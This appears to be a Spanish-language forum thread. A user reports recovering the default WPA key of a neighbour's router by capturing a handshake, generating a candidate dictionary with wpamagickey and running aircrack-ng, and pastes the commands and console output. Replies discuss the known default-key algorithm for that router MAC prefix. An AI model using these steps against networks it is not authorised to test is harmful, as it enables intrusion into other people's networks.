Saludos a la comunidad.
Esta tarde me dió por probar unas cuantas cosillas...
la primera un capturador de handshake que viene en la distro WIFISLAX 4.3 Final(no recuerdo el nombre,pero sólo tiene uno)....una vez obtenido el paquete,reinicio y continúo con xubuntu...
la segunda...me descargo e instalo wpamagickey,una vez hecho,genero un diccionario para una WLAN_XYYX con mac 00:1A:2B...al cual le llamo dicc a secas.(X es Nº e Y LETRA)
Y ya por último,abro consola y le paso el diccionario al handshake con aircrack-ng  y BINGO...me da la wpa....y encima la CORRECTA...
Me explico...después de probar todos y cada uno de los programas que generaban una posible clave por defecto,NI UNO SOLO me dió la wpa correcta...y así durante meses...hasta hoy.
Reconozco que he tenido una suerte INCREÍBLE al estar la pass en el diccionario....no me ha dado tiempo ni a pestañear...apenas 1 sg XD

Os pongo un copy-paste del proceso por consola:

wpakill@MMXIII:~$ sudo wpamagickey  WLAN_XYYX 00:1A:2B:XX:XX:XX dicc



Essid: WLAN_XYYX - Bssid: 00:1A:2B:XX:XX:XX

• Generando fichero de claves: dicc

 Calculadas 512 claves (10.8 kB)                                

• Fichero guardado OK                        

wpakill@MMXIII:~$ sudo aircrack-ng -w /home/wpakill/Escritorio/dicc /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
[sudo] password for wpakill:
Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Read 13050 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1A:2B:XX:XX:XX  WLAN_XYYX                 WPA (1 handshake)

Choosing first network as target.

Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r2230


                   [00:00:01] 232 keys tested (149.21 k/s)


                     KEY FOUND! [ 20 letras y números ]


      Master Key     : 37 EB 8E 74 4F AB CD C0 E8 2D E9 DB 37 3D C3 80
                       edito toda la línea

      Transient Key  : 95 17 4A E6 F8 D4 F6 28 0E BB 2D 5A C3 8E 44 07
                       y 3 líneas mas

      EAPOL HMAC     : edito la línea
wpakill@MMXIII:~$


pd.NI QUÉ DECIR TIENE QUE ESTO PUEDO HACERLO CON EL PERMISO DE MI VECINO-COLEGA...obviamente la pass se la he cambiado yo mismo...una de las que pyrit tardaría 2 ó 3 años......luz

a lo mejor le daba un handsahke corrupto y por eso no le daba la clave  y esta ves le dio la correcta y bingo 

pues no entiendo nada.

hace ya mucho tiempo que sabemos el algoritmo de password de las 00:1A:2B, y aunque no podemos dar la permutación correcta exacta, obtenemos un diccionario donde sí está la pass. insisto, suponiendo que era la pass por defecto.

ademas, si la contraseña eran 20 letras y numeros, es la contraseña por defecto. y si no fuera la pass por defecto, wpamagickey no te la habria dado, cosa que si ha hecho.

claro. depende de la mac. esto se ha dicho muchas veces.
pero en el caso particular de las 00:1A:2B... es de nivel "cerebro-no-requerido"

que aplicacion?